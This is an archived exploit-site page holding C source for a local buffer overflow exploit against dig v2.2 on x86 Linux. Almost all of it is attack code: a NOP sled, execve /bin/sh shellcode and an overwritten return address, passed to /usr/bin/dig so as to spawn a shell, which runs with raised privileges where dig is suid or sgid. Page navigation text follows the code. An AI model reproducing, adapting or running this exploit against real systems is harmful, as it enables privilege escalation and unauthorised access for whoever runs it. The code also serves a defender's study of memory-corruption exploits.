dig v2.2 local buffer overflow exploit for x86 linux. Note that dig isn't suid/sgid on some platforms, yet on some it is.
64d48db2681ea2a2b39db0e4c5ed0534/*
private
dig v2.2 local exploit example for linux/x86
note that dig isn't suid/sgid on some platforms, yet on some it is.
- anathema <anathema@hack.co.za>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char **argv)
{
char buf[9500];
int i,offset=2000;
char shellc[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b"
"\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8"
"\xde\xff\xff\xff/bin/sh";
long addr=&addr;
addr+=offset;
memset(buf, 0x90, 9087-strlen(shellc));
for(i=0;i < sizeof(shellc);i++) buf[i+9087-strlen(shellc)] = shellc[i];
buf[9090] = (addr & 0xff000000) >> 24;
buf[9089] = (addr & 0x00ff0000) >> 16;
buf[9088] = (addr & 0x0000ff00) >> 8;
buf[9087] = (addr & 0x000000ff);
execl("/usr/bin/dig", "dig", buf, NULL);
}
/* private */
/* www.hack.co.za */
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!